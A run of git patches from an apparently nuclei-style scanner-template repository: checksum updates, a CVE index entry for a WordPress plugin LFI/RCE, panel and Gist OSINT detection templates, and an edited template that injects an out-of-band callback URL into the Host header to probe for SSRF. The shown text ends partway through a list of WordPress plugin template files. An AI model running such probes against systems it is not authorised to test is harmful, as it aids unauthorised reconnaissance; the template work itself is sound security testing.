--- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index e4edfbc1ba..9d6aeb2785 100644 --- a/cves.json +++ b/cves.json @@ -2012,3 +2012,4 @@ {"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} +{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index d9e1d54443..a5a83e3322 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e5b11b760f44d352dcb8bc61ac5651ed +bf4766f6ec2eca9601df9f6f4b11e620 From daa07e80eaf4dc87c4a64ecbde20d3daad278e6a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:42:28 +0000 Subject: [PATCH 0156/1090] Auto Generated New Template Addition List [Tue Sep 5 13:42:28 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5cd51e27f1..a592b41cfe 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml +http/exposed-panels/snapcomms-panel.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/missing-sri.yaml From 67d64df8f2bacc698f27dec8eddf1bd716ae882d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:42:31 +0000 Subject: [PATCH 0157/1090] Auto Generated Templates Checksum [Tue Sep 5 13:42:31 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8e67b3feab..7090c7100e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:c051d75a5aae09c4b5cd28c6ce25ecd373091fc5 -cves.json-checksum.txt:88f8a79ef2a514044c505894ed017ea539936074 +cves.json:2a090e44e2e954850ed11618c19e41a19b6988ea +cves.json-checksum.txt:4f43f17c7def002ef9dec7bac05ddb45a5e2f2c3 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -3521,6 +3521,7 @@ http/exposed-panels/siteomat-login.yaml:6e62f26191d161ab3141b6bab5ce22ba14648be3 http/exposed-panels/skycaiji-admin-panel.yaml:142cc4a63f119a567287c02c465104460e789037 http/exposed-panels/slocum-login.yaml:eceaf110eb81eb40fcc551f99db12acf0bc5fd55 http/exposed-panels/smartping-dashboard.yaml:b1095e26454801017cc30f369be60e6df1f87c56 +http/exposed-panels/snapcomms-panel.yaml:91e88a9b8b3078a14842b5c8747506f40ac4b849 http/exposed-panels/solarview-compact-panel.yaml:f2abe48328ee100d63e7cc71f53714cec2e943c9 http/exposed-panels/solarwinds-orion.yaml:7859bb44c607392e51ab0b913d5fc2353cbeda9a http/exposed-panels/solarwinds-servuftp-detect.yaml:0f66dad213bc7fbd0a502992f584098b789a8acf @@ -7042,7 +7043,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:a7d918cc23acd383a3e47f73fd8783ef234d7ca7 +templates-checksum.txt:4e64bea7981b60f3f22ee2baf6e08bd8ade8e5d8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 7742839216d73d10322458126a416a8676b1e68c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Sep 2023 19:32:07 +0530 Subject: [PATCH 0158/1090] Update external-service-interaction.yaml --- http/miscellaneous/external-service-interaction.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 2dbe4d1891..611384bf8b 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -3,7 +3,7 @@ id: external-service-interaction info: name: External Service Interaction author: andreluna - severity: medium + severity: info description: External Service interaction via Host Header Injection. reference: - https://portswigger.net/kb/issues/00300210_external-service-interaction-http @@ -11,17 +11,18 @@ info: - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection classification: cwe-id: CWE-918,CWE-406 - tags: http,misc + tags: http,misc,oast http: - method: GET path: - - "{{BaseURL}}/" - redirects: true - max-redirects: 1 + - "{{BaseURL}}" + headers: Host: "{{interactsh-url}}" + redirects: true + max-redirects: 1 matchers: - type: word part: interactsh_protocol From 4ba27f99ba78f189ac609cd7e25854f82b4e740c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 14:06:10 +0000 Subject: [PATCH 0159/1090] Auto Generated New Template Addition List [Tue Sep 5 14:06:10 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a592b41cfe..e0a0dca370 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml http/exposed-panels/snapcomms-panel.yaml +http/miscellaneous/external-service-interaction.yaml http/miscellaneous/rdap-whois.yaml http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/missing-sri.yaml From 8279a6115e6725e39a39e279ed7b751f3496f316 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 14:06:25 +0000 Subject: [PATCH 0160/1090] Auto Generated Templates Checksum [Tue Sep 5 14:06:25 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7090c7100e..dd1c77ef83 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4239,6 +4239,7 @@ http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:63aa4024f928d8c41e0d80eb19f2b02e1b02af25 http/miscellaneous/exposed-file-upload-form.yaml:9c025ae5e5ce865588cd1d3ea91522b559ff8a23 +http/miscellaneous/external-service-interaction.yaml:089b796041f0ffbab042629a4b057f6279a0b644 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -7043,7 +7044,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:4e64bea7981b60f3f22ee2baf6e08bd8ade8e5d8 +templates-checksum.txt:0e53757589004d0bcc3c4b140593f7a1ace28053 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3fcd1efd727b85cb11a6015a5d35d9ecb1ee9b22 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 14:07:44 +0000 Subject: [PATCH 0161/1090] TemplateMan Update [Tue Sep 5 14:07:44 UTC 2023] :robot: --- http/miscellaneous/external-service-interaction.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 611384bf8b..6c83d1007d 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -11,6 +11,8 @@ info: - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection classification: cwe-id: CWE-918,CWE-406 + metadata: + max-request: 1 tags: http,misc,oast http: From 839dd00ca2ed5b0b8b87f32a20cde0407445a6ea Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 5 Sep 2023 18:43:04 +0200 Subject: [PATCH 0162/1090] Create dxplanning-panel.yaml --- http/exposed-panels/dxplanning-panel.yaml | 36 +++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/exposed-panels/dxplanning-panel.yaml diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml new file mode 100644 index 0000000000..ef76af9699 --- /dev/null +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -0,0 +1,36 @@ +id: dxplanning-panel + +info: + name: DXPlanning Panel - Detect + author: righettod + severity: info + description: | + DXPlanning was detected. + reference: + - https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf + metadata: + max-request: 1 + verified: true + tags: panel,dxplanning,login,detect + +http: + - method: GET + path: + - '{{BaseURL}}/' + - '{{BaseURL}}/DxPlanning/WebBooking/Version' + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(tolower(body), 'dxplanning/webbooking/') && status_code==200" + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' From 923f2e1b5731c41498bd67f29fb22fb9ec3ea308 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 5 Sep 2023 18:54:42 +0200 Subject: [PATCH 0163/1090] Fix linter error --- http/exposed-panels/dxplanning-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index ef76af9699..1baa1d535b 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -18,7 +18,7 @@ http: path: - '{{BaseURL}}/' - '{{BaseURL}}/DxPlanning/WebBooking/Version' - + host-redirects: true max-redirects: 2 matchers-condition: and From 6671ef677789876c4d248af6cc1e57faee058dfa Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 5 Sep 2023 17:40:20 -0500 Subject: [PATCH 0164/1090] Create gist.yaml --- http/osint/gist.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/osint/gist.yaml diff --git a/http/osint/gist.yaml b/http/osint/gist.yaml new file mode 100644 index 0000000000..1716dbc860 --- /dev/null +++ b/http/osint/gist.yaml @@ -0,0 +1,31 @@ +id: gist + +info: + name: Gist User Name Information - Detect + author: philippedelteil + description: Gist user name information check was conducted. + severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: osint,osint-coding,gist,github + metadata: + max-request: 1 + +self-contained: true +http: + - method: GET + path: + - "https://gist.github.com/{{user}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "p-nickname vcard-username d-block" From 51b7aa6454db606ecaa4737fa73f8f0ba26201c3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 03:49:45 +0000 Subject: [PATCH 0165/1090] Auto Generated New Template Addition List [Wed Sep 6 03:49:45 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e0a0dca370..f34fb5d499 100644 --- a/.new-additions +++ b/.new-additions @@ -30,6 +30,7 @@ http/takeovers/lemlist-takeover.yaml http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml +http/token-spray/api-notolytix.yaml http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml http/vulnerabilities/jorani/jorani-benjamin-xss.yaml From 0575371d9f55432231550bc10c05f781f30ef32b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 03:49:54 +0000 Subject: [PATCH 0166/1090] Auto Generated Templates Checksum [Wed Sep 6 03:49:53 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dd1c77ef83..a82d84b964 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4239,7 +4239,7 @@ http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:63aa4024f928d8c41e0d80eb19f2b02e1b02af25 http/miscellaneous/exposed-file-upload-form.yaml:9c025ae5e5ce865588cd1d3ea91522b559ff8a23 -http/miscellaneous/external-service-interaction.yaml:089b796041f0ffbab042629a4b057f6279a0b644 +http/miscellaneous/external-service-interaction.yaml:c5a4a57e1aaa133711e415b5f69f20c835a2ba71 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -6170,6 +6170,7 @@ http/token-spray/api-nerdgraph.yaml:eb7c825b7c1dfdea41f59a1f63e9283bb4b40c08 http/token-spray/api-netlify.yaml:8e0c907d30433722a2065ded3d68b293fd21e745 http/token-spray/api-networksdb.yaml:52bd66b85eb3afc506ee0028f193e6f076f64566 http/token-spray/api-newrelic.yaml:39270dabccfcd202f8c64ce051daa29851a43b72 +http/token-spray/api-notolytix.yaml:474eee89bd0acdf068a2ae159e0bc6d0cd651162 http/token-spray/api-nownodes.yaml:ab9202c8d145453a5e64494c606e60cb9c89c58a http/token-spray/api-npm.yaml:11341dd47f3741abe55d3e840be0a9db8655b126 http/token-spray/api-nytimes.yaml:a118b331fdde18c040f0978adad59006cd060fec @@ -7044,7 +7045,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:0e53757589004d0bcc3c4b140593f7a1ace28053 +templates-checksum.txt:be2f1522378a9700862e86e43cce210abc689d16 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 0fb18e07a1ef8b9336a9288bd3e7b80f2b84992b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 03:51:29 +0000 Subject: [PATCH 0167/1090] TemplateMan Update [Wed Sep 6 03:51:29 UTC 2023] :robot: --- http/token-spray/api-notolytix.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/token-spray/api-notolytix.yaml b/http/token-spray/api-notolytix.yaml index 3f2186f63e..29f4298b3f 100644 --- a/http/token-spray/api-notolytix.yaml +++ b/http/token-spray/api-notolytix.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://notolytix.com/ + metadata: + max-request: 1 tags: notolytix,token-spray self-contained: true From fc1b2a4650c249e58c389b1eb75dcda16c6e9a65 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 04:02:05 +0000 Subject: [PATCH 0168/1090] Auto WordPress Plugins Update [Wed Sep 6 04:02:05 UTC 2023] :robot: --- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/header-footer-code-manager.txt | 2 +- helpers/wordpress/plugins/host-webfonts-local.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/mainwp-child.txt | 2 +- helpers/wordpress/plugins/pinterest-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 